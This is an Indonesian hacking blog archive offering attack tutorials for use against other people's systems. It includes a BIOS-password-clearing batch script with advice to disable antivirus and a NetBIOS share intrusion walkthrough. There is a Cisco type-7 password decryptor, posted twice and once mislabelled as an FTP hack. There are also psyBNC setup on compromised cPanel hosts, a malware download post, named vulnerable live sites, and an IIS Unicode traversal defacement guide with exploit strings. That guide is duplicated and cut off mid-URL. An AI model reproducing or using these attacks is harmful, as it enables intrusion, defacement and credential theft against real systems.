Dengan sedikit bermain-main dengan Batch programming, kamu bisa me-reset password BIOS. Perlu kamu ketahui bahwa kode berikut ini akan dideteksi sebagai Virus oleh komputermu. So, disable dulu antivirusmu sebelum kamu mencopy-paste script berikut. Okeh.. ga' usah banyak omong.. lansung ajah neeh...
ctty nul
cls
@echo o 70 2e>>c:\Spyro.deb
@echo o 71 ff>>c:\Spyro.deb
@echo q>>c:\Spyro.deb
@debug
@del c:\Spyro.deb>nul
ctty con
cls
Simpan dengan nama terserahkamu.bat dan jalankan... Beres dech... restart komputer kamu.. ;)
Diposkan oleh Dj BxxA di 05:22 0 komentar Link ke posting ini
Label: yang iseng-iseng
MENEMBUS PASSWORD ADMIN WINDOWS XP
1. Nyalakan komputer yang ingin anda tembus passwordnya dan masuklah safe mode (Tekan F8)
2. Tekan Ctrl + alt + Del dan isilah form pada kotak dialog yang muncul dengan:
Login : Administrator
Password : Terserah
3. Reboot Pc tersebut.
4. Lakukan hal yang sama seperti langkah 2 dan kini anda memiliki kuasa penuh dengan komputer tersebut ;)
Diposkan oleh Dj BxxA di 05:18 0 komentar Link ke posting ini
Label: yang iseng-iseng
kirim pesen via cmd
Untuk pengguna komputer dalam sebuah jaringan LAN bisa memanfaatkan perintah pada command prompt yang bisa kirim pesan tanpa memerlukan software tambahan hhe.
Command Prompt bisa diakses dari menu Start/Programs/Accessories/Command Prompt atau dari Start/Run dan ketik cmd.
Caranya cukup gampang, dengan menggunakan command “NET SEND” anda sudah bisa mengirim pesan ke rekan anda yang terhubung LAN.
Format perintahnya adalah:
NET SEND (nama komputer) (isi pesan)
Example? Anda ingin kirim pesan ke komputer dengan nama komp1 cukup ketik:
net send komp1 bona itu keren lho :P
Bilamana pesan akan dikirim ke semua komputer dalam workgroup yang sama maka nama komputer diganti dengan ( * ), dan pesan akan muncul di semua komputer.
net send * bona itu ganteng lho :P
Perlu diinget bahwa sebelum perintah ini bisa jalanin terlebih dulu harus diaktifin service untuk messengerna.
carana:
Buka Control Panel/Administratif Tools/Services. Bilamana status pada service Messenger disable maka harus diaktifkan terlebih dahulu :D. Klik kanan pada Messenger /Properties, Startup type diganti dengan Automatic>>klik Aplly>>klik Start.. OK.
Diposkan oleh Dj BxxA di 04:50 0 komentar Link ke posting ini
Label: yang iseng-iseng
Jumat, 18 September 2009
6000 Virus ready to use
download:
download here
download here
Hack!
Or Get Hacked!!
If u like my post leave me a reply!!!
Diposkan oleh Dj BxxA di 23:00 0 komentar Link ke posting ini
Label: yang iseng-iseng
Senin, 27 Juli 2009
Install psyBNC & Eggdrop di cpanel bug
kebiasaan hacker hacker kita mencari rooting adalah untuk membuat bot eggdrop atau membuat psybnc. Namun saya beranggapan bhw kebanyakan teman teman sekalian kebingungan cara sehingga banyaklah situs situs yang di deface.
apakah kita bisa install psybnc di cpanel bug ?
lebih lanjut...
1. saya anggap bhw anda sudah berhasil melakukan upload ke dalam situs yang anda ambil lewat cpanel bug. Bila anda belum paham, silahkan anda baca tutorial tentang mengexplorasi cpanel < 5.3 di tulisan sebelumnya.
2. Upload ke dalam situs tersebut file yang bisa sebagai mediator seperti layaknya shell. Beberapa file yang bisa dijadikan mediator antara lain cgitelnet.pl, myshell.php, phpshell.php.
3. Bekerjalah di mediator tersebut.
4. Saat bekerja dengan mediator tersebut perlu anda ingat bhw kita bekerja di port 80 dengan notabene bhw anda adalah nobody (id) sehingga kita tdk bisa melakukan apapun di dalamnya. Namun kita bisa bekerja di wilayah /tmp/. Pindahlah ke folder /tmp/ dan selanjutnya bekerjalah diruang lingkup tersebut.
5. Proses instalasi psyBNC tidak akan saya jelaskan disini, karena saya anggap bhw anda sudah mahir. namun yang jadi sering kendala adalah saat mengganti port psyBNC tersebut.
6. Untuk melakukan editing port yaitu dengan menggunakan command echo. pertama adalah lakukan cat psybnc.conf
PSYBNC.SYSTEM.PORT1=31337
PSYBNC.SYSTEM.HOST1=*
PSYBNC.HOSTALLOWS.ENTRY0=*;*
Tentunya anda perlu buat ganti port tersebut.
ketiklah sebagai berikut untuk mengganti portnya
echo PSYBNC.SYSTEM.PORT1=5000 > psybnc.conf ; echo "PSYBNC.SYSTEM.HOST1=*" >> psybnc.conf ; echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> psybnc.conf
sehingga kita mendapatkan port baru yaitu port 5000
7. selanjutnya tinggal running ./psybnc dan saya sarankan anda buat menggunakan program fake untuk menghindari adminnya.
Diposkan oleh Dj BxxA di 02:08 0 komentar Link ke posting ini
Label: yang iseng-iseng
Install 2 OS
1. saya asumsikan bahwa komputer anda sudah terinstalasi windows 98 (win 2000) dengan baik, apa bila belum maka bapak dapat menginstalnya terlebih dahulu.
2. bila windows 98 sudah terinstal, maka ada baiknya bapak sudah memback-up semua data bapak, kalau-kalau terjadi kesalahan dalam mempartisi, karena kita masih sam-sama belajar, jadi pada awalnya kita harus membuat pencegahan.
3. kemudian installah partition magic 7.0 (ada dalam : pc shop 2002, pc shop 121, pc shop 2003)pada komputer bapak. dari sinilah kita memulai partisi dari hardisk tersebut.
4.setelah partition magic tadi sudah terinstal (diasumsikan bahwa tidak ada masalah pada saat anda mengFDISK komputer bapak), dalam hardisk bapak terbagi dua c:/ dan d:/, maka kita buat new partition pada hardisk bapak tersebut, kemudian kita bisa memilihnya , ada linux dan lain-lain (baca semua instruksinya, dan ikuti semua keterangan yang "recomended").
setelah partisi untuk linux dan swap-nya sudah di buat, maka bapak dapat merestart komputer bapak, dan selanjutnya partition maic yan akan bekerja untuk membagi harddisk tersebut.
5. (diasumsikan bahwa hardisk tsb telah terpartisi), maka bapak dapat merestart kembali dan kemudian mengset bios agar dapat booting dari cd-rom. lalu bapak masukan linux redhat 7.3 dan mulailah untuk menginstalnya. bapak dapat menggunakan yang graphic mode agar lebih mudah dalam penginstalan.
6. setelah itu anda tinggal next, kemudian tibalah pada language bapak dapat memilih English next lagi, installation type bapak pilih workstation, kemudian disk partitioning setup, bapak pilih “have the installer automatically partition for you”.
7. tiba pada “Automatic Partitioning” bapak pilih keep all partition and use existing free space kemudian next, bila ada pilihan (pilih OK).
8. tiba pada disk setup : klik di table dibawah yang memunyai mount = / (garis miring) kemudian di next lalu (OK).
9. boot loade configuration : bapak dapat memilih GRUB, terserah apabila mau memilih lilo, tapi kemarin saya memakai grub dan tidak bermasalah. kemudian klik di boot image nya pilih boot label DOS. Lalu tinggal next, dan selanjutnya untuk instalasi yang lain mungkin bapak bisa lanjutkan sendiri. Karena semua yang berhubungan dengan setting dual OS sudah lewat.
Diposkan oleh Dj BxxA di 02:06 0 komentar Link ke posting ini
Label: yang iseng-iseng
Hack Windows 98
1. Ok, first check to see that you have all of the necessary files.
Here they are, these should be in the control panel (start, run, control panel, network).
1. NetBEUI
2. TCP/IP
3. IPX/SPX
4. Client for Microsoft Networks
5. File Sharing for Microsoft
Of course you will also have a dial up adapter or an ethernet adapter based on
your network topology.
Ok, now that you have all that installed, you can check out remote computers.
Windows 95 is very limited in the ways you can attack remote hosts. After many
long hours I figured out a way that always works. Ok, so first get an IP. These
are easy to get. You can go on IRC and just /whois people or you can use Legion, just
check a search engine to check a bunch of IP's with filesharing enabled.
Ok, so now that you have an IP, try this...
nbtstat -A 123.456.789.1 (Fill in actual IP)
Netbios Name
^
SHARE <00>
SHARE <20> That's what we want!
FILE <1b>
and so on..
If they have the 20 there that means that they might be vulnerable. So,
go to start, programs, accessories, notepad. Then, go to start, run,
c:\windows. Then click and drag the lmhosts (exactly lmhosts, not lmhosts.sam. Check
winfile for extension) into the notepad. Add the following. So, we have our IP and netbiosname
123.456.789.1 SHARE #PRE
Then, click on File, Save. Then from MS-DOS prompt type
nbtstat -R <-- to refresh netbios>
Then, go to start, find, computer and enter the netbiosname of the
computer of the IP you have. If it finds it, that means that it has
filesharing on it, if you get a password prompt, you can try but I wouldn't
suggest it. Many computers don't have password protection. So, this was really
brief but it works, and that's what matters.
Diposkan oleh Dj BxxA di 02:04 0 komentar Link ke posting ini
Label: yang iseng-iseng
Hacking Cisco
#include
#include
char xlat[] = {
0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
};
char pw_str1[] = "password 7 ";
char pw_str2[] = "enable-password 7 ";
char *pname;
cdecrypt(enc_pw, dec_pw)
char *enc_pw;
char *dec_pw;
{
unsigned int seed, i, val = 0;
if(strlen(enc_pw) & 1)
return(-1);
seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';
if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))
return(-1);
for (i = 2 ; i <= strlen(enc_pw); i++) {
if(i !=2 && !(i & 1)) {
dec_pw[i / 2 - 2] = val ^ xlat[seed++];
val = 0;
}
val *= 16;
if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {
val += enc_pw[i] - '0';
continue;
}
if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {
val += enc_pw[i] - 'A' + 10;
continue;
}
if(strlen(enc_pw) != i)
return(-1);
}
dec_pw[++i / 2] = 0;
return(0);
}
usage()
{
fprintf(stdout, "Usage: %s -p \n", pname);
fprintf(stdout, " %s \n", pname);
return(0);
}
main(argc,argv)
int argc;
char **argv;
{
FILE *in = stdin, *out = stdout;
char line[257];
char passwd[65];
unsigned int i, pw_pos;
pname = argv[0];
if(argc > 1)
{
if(argc > 3) {
usage();
exit(1);
}
if(argv[1][0] == '-')
{
switch(argv[1][1]) {
case 'h':
usage();
break;
case 'p':
if(cdecrypt(argv[2], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
fprintf(stdout, "password: %s\n",
passwd);
break;
default:
fprintf(stderr, "%s: unknow option.",
pname);
}
return(0);
}
if((in = fopen(argv[1], "rt")) == NULL)
exit(1);
if(argc > 2)
if((out = fopen(argv[2], "wt")) == NULL)
exit(1);
}
while(1) {
for(i = 0; i < 256; i++) {
if((line[i] = fgetc(in)) == EOF) {
if(i)
break;
fclose(in);
fclose(out);
return(0);
}
if(line[i] == '\r')
i--;
if(line[i] == '\n')
break;
}
pw_pos = 0;
line[i] = 0;
if(!strncmp(line, pw_str1, strlen(pw_str1)))
pw_pos = strlen(pw_str1);
if(!strncmp(line, pw_str2, strlen(pw_str2)))
pw_pos = strlen(pw_str2);
if(!pw_pos) {
fprintf(stdout, "%s\n", line);
continue;
}
if(cdecrypt(&line[pw_pos], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
else {
if(pw_pos == strlen(pw_str1))
fprintf(out, "%s", pw_str1);
else
fprintf(out, "%s", pw_str2);
fprintf(out, "%s\n", passwd);
}
}
}
Selamat mencoba moga2 berguna buat temen.
Diposkan oleh Dj BxxA di 02:03 0 komentar Link ke posting ini
Label: yang iseng-iseng
Hack FTP
#include
#include
char xlat[] = {
0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
};
char pw_str1[] = "password 7 ";
char pw_str2[] = "enable-password 7 ";
char *pname;
cdecrypt(enc_pw, dec_pw)
char *enc_pw;
char *dec_pw;
{
unsigned int seed, i, val = 0;
if(strlen(enc_pw) & 1)
return(-1);
seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';
if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))
return(-1);
for (i = 2 ; i <= strlen(enc_pw); i++) {
if(i !=2 && !(i & 1)) {
dec_pw[i / 2 - 2] = val ^ xlat[seed++];
val = 0;
}
val *= 16;
if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {
val += enc_pw[i] - '0';
continue;
}
if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {
val += enc_pw[i] - 'A' + 10;
continue;
}
if(strlen(enc_pw) != i)
return(-1);
}
dec_pw[++i / 2] = 0;
return(0);
}
usage()
{
fprintf(stdout, "Usage: %s -p \n", pname);
fprintf(stdout, " %s \n", pname);
return(0);
}
main(argc,argv)
int argc;
char **argv;
{
FILE *in = stdin, *out = stdout;
char line[257];
char passwd[65];
unsigned int i, pw_pos;
pname = argv[0];
if(argc > 1)
{
if(argc > 3) {
usage();
exit(1);
}
if(argv[1][0] == '-')
{
switch(argv[1][1]) {
case 'h':
usage();
break;
case 'p':
if(cdecrypt(argv[2], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
fprintf(stdout, "password: %s\n",
passwd);
break;
default:
fprintf(stderr, "%s: unknow option.",
pname);
}
return(0);
}
if((in = fopen(argv[1], "rt")) == NULL)
exit(1);
if(argc > 2)
if((out = fopen(argv[2], "wt")) == NULL)
exit(1);
}
while(1) {
for(i = 0; i < 256; i++) {
if((line[i] = fgetc(in)) == EOF) {
if(i)
break;
fclose(in);
fclose(out);
return(0);
}
if(line[i] == '\r')
i--;
if(line[i] == '\n')
break;
}
pw_pos = 0;
line[i] = 0;
if(!strncmp(line, pw_str1, strlen(pw_str1)))
pw_pos = strlen(pw_str1);
if(!strncmp(line, pw_str2, strlen(pw_str2)))
pw_pos = strlen(pw_str2);
if(!pw_pos) {
fprintf(stdout, "%s\n", line);
continue;
}
if(cdecrypt(&line[pw_pos], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
else {
if(pw_pos == strlen(pw_str1))
fprintf(out, "%s", pw_str1);
else
fprintf(out, "%s", pw_str2);
fprintf(out, "%s\n", passwd);
}
}
}
Selamat mencoba moga2 berguna buat temen.
Diposkan oleh Dj BxxA di 02:02 0 komentar Link ke posting ini
Label: yang iseng-iseng
ASP
lebih lanjut...
ARF yang dikeluarkan oleh http://www.asp-dev.com/ bekerja pada platform Windows memiliki bug yang sangat fatal. Yaitu admin (sebenarnya admin atau pembuat template ya ?) tidak memberikan login username dan password pada bagian administrator web nya, sehingga siapa saja bisa masuk melalui http://www.target.com/forum/admin/default.asp
Sehingga semua orang bisa masuk dan melakukan editing / penghapusan / penambahan isi dari BBS -nya.
Jika anda menggunakan template tersebut dalam BBS anda, sebaiknya menambahkan login username dan password pada bagian /admin/default.asp sehingga BBS anda terhindar dari kejahilan orang lain.
Contoh yang bisa dicoba seperti berikut ini (saat penulisan ini belum dipatch) :
1. http://www.rvnair.com/bbs/admin/default.asp
2. http://www.equuspages.com/forum/forum2/admin/
3. http://www.joinweb.com/forum/admin/
Diposkan oleh Dj BxxA di 02:01 0 komentar Link ke posting ini
Label: yang iseng-iseng
Lumpuhkan Deepfreeze
Untuk Uninstall program ini atau melakukan perubahan
yang permanen pada windows, misalnya install program
baru, dibutuhkan password yang di set pada saat
install DeepFreeze.
Tanpa password ini jangan harap anda dapat merubah
setting komputer anda, jadi bisa dibayangkan jikalau
anda lupa password tersebut (mungkin yang anda lakukan
adalah memformat hardisk tersebut).
Namun jika anda mengalaminya jangan khawatir, ikuti
langkah-langkah berikut, mudah-mudahan masalah anda
dapat terselesaikan.
1. Download "XDeepFreeze" di
http://geocities.com/macancrew/xdeepfreeze.zip
2. Ekstrak ke C:\XDeepfreeze
3. Jalankan "Run_Me.exe" yang akan menghasilkan file
"mcr.bat" dan "XDeepFreeze.exe" akan terload.
4. Pada XDeepFreeze, Tekan "Stop DeepFreeze", untuk
menghentikan "frzstate.exe"
5. Pada XDeepFreeze, Tekan "Clean Registry", untuk
membersihkan registry yang dibuat deepfreeze pada saat
install.
6. Untuk masuk ke MS-Dos Mode, Jalankan "command.com"
(Sudah disertakan pada "xdeepfreeze.zip")
7. Jalankan "mcr.bat" (Berisi perintah yang akan
menghapus file "persifrz.vxd")
8. Ketik "Exit" untuk masuk ke Windows kembali.
Dan.....DeepFreeze tidak berfungsi lagi.
Silahkan install ulang DeepFreeze, ingat dan catat
baik-baik password yang anda gunakan.
Jika anda lupa lagi lakukan kembali cara diatas
Diposkan oleh Dj BxxA di 02:00 0 komentar Link ke posting ini
Label: yang iseng-iseng
Deface NT Web
Deface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan sebuah situs. Tentu saja prosesnya dilakukan dengan memanfaatkan kelemahan dari situs tersebut, sehingga kalo loe adalah web master dan loe ngerubah tampilan halaman situs yang loe punya tentu saja
itu nggak bisa disebut deface...heheheh. Banyak yang bertanya "gimana sich nge-deface situs?" seperti yang telah gue sebutin diatas proses deface dilakukan dengan memanfaatkan lubang (hole) yang terdapat pada server tempat situs itu berada. Sehingga hal pertama yang harus kamu ketah
ui untuk melakukan proses deface adalah OS (Operating System) dari server situs tersebut. Hal ini karena karakteristik dari tiap OS yang berbeda-beda, contohnya antara IIS dengan BSD tentu saja sangat berbedaapabila kita ingin melakukan deface diantara kedua OS tsb. Operating
System atau OS biasanya kalo gue sich gue kelompikin ke 2 keluarga besar,yaitu :
1. IIS (server untuk microsoft, dkk)
2. Unix(linux,BSD,IRIX,SOLARIS,dsb)
Nah kita kelompikin jadi 2 gitu aja yah..:) sekarang saya coba jelaskan satu-satu. Dikarenakan sudah banyak tutorial yang membahas mengenai kelemahan dari IIS (baik IIS 4 maupun 5) maka disini gue cumancopy-paste tutorial yang pernah dibuat oleh salah satu "maha guru" dalam
komunitas #cracxer di DALNET, yah sapa lagi kalo bukan "pak-tani" (master..paLa loE lONjoNG..!!) heheheeh... ini dia tutorialnya :
~*~DEFACING NT WEB SERVER WITH BUG UNICODE MICROSOFT IIS~*~
-------------------------------------------------------------
Melalui tutor ini saya teh hanya ingin berbagi pengalaman mengenai cara men-deface website yang
menggunakan Microsoft Internet Information Server atau Microsoft IIS. Harap DeFaceR (sebutan bagi org yg suka deface..;p) ketahui...Microsoft Internet Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang dinamakan "unicode bug". Sayah tidak akan menjelaskan panjang lebar mengenai "unicode bug" ini karena sayah takut salah menjelaskan (ssSSTTtHHH!! jgn bilang sapa2 yah sebenernyah sayah teh emang gak tau ...ehehehheehhe..;p~). Yang jelas dengan bug ini kita bisa mengeksplorasi komputer target dengan hanya menggunakan internet browser.
OK...mari kita mulai...Pertama kita cari site site target terlebih dahulu di search engine (google,yahoo,dll)...key nya terserah kowe.....Lalu utk mengetahui site itu menggunakan
MS IIS 4.0/5.0...Kita scan terlebih dahulu di www.netcraft.com......dapat site yah..??...Okeh..
setelah kita mendapatkan site yg menggunakan MS IIS 4.0/5.0 ...Langkah selanjutnya utk mengetahui site tersebut belum di-patch bug unicode nya mari kita scan site tersebut di mirc (utk mengeteahui cara scan lewat mirc....coba koe buka http://www.jasakom.com/hacking.asp page 3 Scanning Exploit Unicode Dengan MIRC),bisa juga memakai sopwer yg bisa and DL di http://accessftp.topcities.com/.... or memakai cara manual yg lebih sering sayah gunakan ehehhehehhee...contoh:
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
Ada dua kemungkinan yang tampil pada browser Anda yaitu:
Kahiji : Muncul pesan ERROR ...
Kaduana : Muncul daftar file-file dari drive C pada komputer server target. Bila ini terjadi maka
www.targethost.com tadi ada kemungkinan untuk bisa kita deface...
Mari kita perhatikan URL aneh bin ajaib diatas. Akan sayah bagi URL diatas menjadi empat bagian yaitu :
• Bagian host, yaitu "http://www.targethost.com"
• Bagian exploit string, yaitu "/scripts/..%255c..%255c"
• Bagian folder, yaitu "/winnt/system32/"
• Bagian command, yaitu "cmd.exe?/c+dir+c:\"
Kita lihat pada bagian command diatas menunjukkan perintah "dir c:\" yang berarti melihat seluruh
file-file yang berada pada root drive C. Koe bisa mencoba perintah yang lain seperti "dir d:\"
atau yang lain. Ingat, Koe harus mengganti karakter spasi dengan tanda "+". Koe bahkan bisa menge
tahui konfigurasi IP address komputer tujuan dengan mengetikkan perintah "ipconfig.exe /all"
Selain itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error pada
browser koe. Untuk itu koe ganti sajah bagian eksploit stringnyah, eksploit string yg sering
tembus adalah :
- /cgi-bin/..%255c..%255c
- /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af..
- /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /scripts/..%255c..%255c
Jika semua pilihan eksploit string diatas masih memunculkan pesan error pada browser koe maka
kemungkinan besar IIS pada web server sudah di-patch bug unicode nya (OR IE kowe yg lagie dodolss ...hiheiehiehiehei). Dan koe bisa memilih situs lain sebagai sasaran....(yg sabar yah nak nyari targetnyah...ehehhehehe).
Lanjuttt......udeh dapet site yg bug unicodenyah gak di patch..??....Langkah berikutnya adalah
mengetahui di folder manakah diletakkan dokumen-dokumen web seperti default.htm/html/asp,,
index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada juga yg pake .php/php3/shtml.
Folder ini dinamakan web root. Biasanya web root berada di C:\InetPub\wwwroot\ atau
D:\InetPub\wwwroot. Tapi terkadang web administrator menggantinya dengan yang lain. Untuk mengetahuinya koe cukup mengetikkan URL seperti di bawah ini
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+set
URL diatas akan menampilkan daftar environment variable dari web server sasaran. Kebuka..??...
Nah tugas koe skrg adalah mencari PATH_TRANSLATED atau tulisan PATH_TRANSLATEDnyah...gak ada yahh ..??...coba deh koe ripresh lagehh...udah ketemuuu...nah skrg kita DIR deh tuh si PATH_TRANSLATED nyah.....Kita ambil contoh PATH_TRANSLATEDnyah : C:\InetPub\wwwroot....Perintahnya ng-DIR nyah :
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
Huaaaaaaa....isinyah banyak banged yahh.....mana dokumen2 web yg kita curigain itu ada 3 bijih
lagehh....hemm santeyy...oiyahh...lupa sayah...Tugas kita setelah ng-DIR PATH_TRANSLATEDnyah.....
truss kita cari dokumen web itu disitu utk kita RENAME....gemana kalo misalnyah dokumen2 web yg kita curigain itu ada 3..santeyy...coba skrg koe buka site aslinyah di laen window....
http://www.targethost.com == neh yg ini......di situ kan alias di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
dokumen2 web nyah ada 3 macem pasti kita bingung yg mana neh yg mo di RENAME....misalnya : di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot itu ada :
Directory of C:\InetPub\wwwroot
07/20/01 03:21p 1,590 default.htm
07/20/01 03:21p 590 index.html
07/20/01 03:21p 3,453 main.html
Udah di buka kan site aslinyah...nah coba masukin salah satu dokumen web itu di site asli nyah...
contoh : http://www.targethost.com/default.htm kita liad hasilnya apa kah sama gambarnya (halaman depannya) setelah kita masukin dokumen web tadee.waww ternyata tidak sama hemm.coba masukin lageh salah satu dokumen web itu site aslinyah.mMmm..kita masukin yg main.html.waww waww..ternyata sama gambarnyahh.Nah skrg kita RENAME deh yg main.html ituu. perintahnya :
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ren+C:\InetPub\wwwroot\main.html+gue.html
Lihat apa yg terjadi di IE kitaa
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access is denied
Yahhhh..akses dineyy.hiekksss jgn nyerah bro` kita carih lageh targetnyah okeHh !!!Dapat
targetnyah..??udah di RENAME nyah??.Hasilnya setelah di RENAME seperti di bawah ini bukan??
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :
Kalo iyahh.waaa selamat anda telah merubah or berhasil men-deface halaman depan web site
tersebut.kalo gak caya buka ajah site aslinyah pasti ERROR kann ehehhehehhee
(Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file yg kita rename tadi di notepad utk
langkah selanjutnyah*)
Sekarang koe tugasnyah meng-upload file koe ke site tadee Ada dua cara my bro` Pertama lewat ECHO..
Kedua lewat TFTP32.
*Cara pertama :*
Utk meng-upload file lewat echo sebelumnyah kita harus mengcopy file cmd.exe pada direktori
C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan nama lain, misalnya cmdku.exe
. Untuk meng-copy cmd.exe menjadi cmdku.exe pada folder winnt\system32 maka cukup ketik URL
berikut :
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.ex
Diposkan oleh Dj BxxA di 01:59 0 komentar Link ke posting ini
Label: yang iseng-iseng
Deface NT Web
Deface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan sebuah situs. Tentu saja prosesnya dilakukan dengan memanfaatkan kelemahan dari situs tersebut, sehingga kalo loe adalah web master dan loe ngerubah tampilan halaman situs yang loe punya tentu saja
itu nggak bisa disebut deface...heheheh. Banyak yang bertanya "gimana sich nge-deface situs?" seperti yang telah gue sebutin diatas proses deface dilakukan dengan memanfaatkan lubang (hole) yang terdapat pada server tempat situs itu berada. Sehingga hal pertama yang harus kamu ketah
ui untuk melakukan proses deface adalah OS (Operating System) dari server situs tersebut. Hal ini karena karakteristik dari tiap OS yang berbeda-beda, contohnya antara IIS dengan BSD tentu saja sangat berbedaapabila kita ingin melakukan deface diantara kedua OS tsb. Operating
System atau OS biasanya kalo gue sich gue kelompikin ke 2 keluarga besar,yaitu :
1. IIS (server untuk microsoft, dkk)
2. Unix(linux,BSD,IRIX,SOLARIS,dsb)
Nah kita kelompikin jadi 2 gitu aja yah..:) sekarang saya coba jelaskan satu-satu. Dikarenakan sudah banyak tutorial yang membahas mengenai kelemahan dari IIS (baik IIS 4 maupun 5) maka disini gue cumancopy-paste tutorial yang pernah dibuat oleh salah satu "maha guru" dalam
komunitas #cracxer di DALNET, yah sapa lagi kalo bukan "pak-tani" (master..paLa loE lONjoNG..!!) heheheeh... ini dia tutorialnya :
~*~DEFACING NT WEB SERVER WITH BUG UNICODE MICROSOFT IIS~*~
-------------------------------------------------------------
Melalui tutor ini saya teh hanya ingin berbagi pengalaman mengenai cara men-deface website yang
menggunakan Microsoft Internet Information Server atau Microsoft IIS. Harap DeFaceR (sebutan bagi org yg suka deface..;p) ketahui...Microsoft Internet Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang dinamakan "unicode bug". Sayah tidak akan menjelaskan panjang lebar mengenai "unicode bug" ini karena sayah takut salah menjelaskan (ssSSTTtHHH!! jgn bilang sapa2 yah sebenernyah sayah teh emang gak tau ...ehehehheehhe..;p~). Yang jelas dengan bug ini kita bisa mengeksplorasi komputer target dengan hanya menggunakan internet browser.
OK...mari kita mulai...Pertama kita cari site site target terlebih dahulu di search engine (google,yahoo,dll)...key nya terserah kowe.....Lalu utk mengetahui site itu menggunakan
MS IIS 4.0/5.0...Kita scan terlebih dahulu di www.netcraft.com......dapat site yah..??...Okeh..
setelah kita mendapatkan site yg menggunakan MS IIS 4.0/5.0 ...Langkah selanjutnya utk mengetahui site tersebut belum di-patch bug unicode nya mari kita scan site tersebut di mirc (utk mengeteahui cara scan lewat mirc....coba koe buka http://www.jasakom.com/hacking.asp page 3 Scanning Exploit Unicode Dengan MIRC),bisa juga memakai sopwer yg bisa and DL di http://accessftp.topcities.com/.... or memakai cara manual yg lebih sering sayah gunakan ehehhehehhee...contoh:
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
Ada dua kemungkinan yang tampil pada browser Anda yaitu:
Kahiji : Muncul pesan ERROR ...
Kaduana : Muncul daftar file-file dari drive C pada komputer server target. Bila ini terjadi maka
www.targethost.com tadi ada kemungkinan untuk bisa kita deface...
Mari kita perhatikan URL aneh bin ajaib diatas. Akan sayah bagi URL diatas menjadi empat bagian yaitu :
• Bagian host, yaitu "http://www.targethost.com"
• Bagian exploit string, yaitu "/scripts/..%255c..%255c"
• Bagian folder, yaitu "/winnt/system32/"
• Bagian command, yaitu "cmd.exe?/c+dir+c:\"
Kita lihat pada bagian command diatas menunjukkan perintah "dir c:\" yang berarti melihat seluruh
file-file yang berada pada root drive C. Koe bisa mencoba perintah yang lain seperti "dir d:\"
atau yang lain. Ingat, Koe harus mengganti karakter spasi dengan tanda "+". Koe bahkan bisa menge
tahui konfigurasi IP address komputer tujuan dengan mengetikkan perintah "ipconfig.exe /all"
Selain itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error pada
browser koe. Untuk itu koe ganti sajah bagian eksploit stringnyah, eksploit string yg sering
tembus adalah :
- /cgi-bin/..%255c..%255c
- /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af..
- /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /scripts/..%255c..%255c
Jika semua pilihan eksploit string diatas masih memunculkan pesan error pada browser koe maka
kemungkinan besar IIS pada web server sudah di-patch bug unicode nya (OR IE kowe yg lagie dodolss ...hiheiehiehiehei). Dan koe bisa memilih situs lain sebagai sasaran....(yg sabar yah nak nyari targetnyah...ehehhehehe).
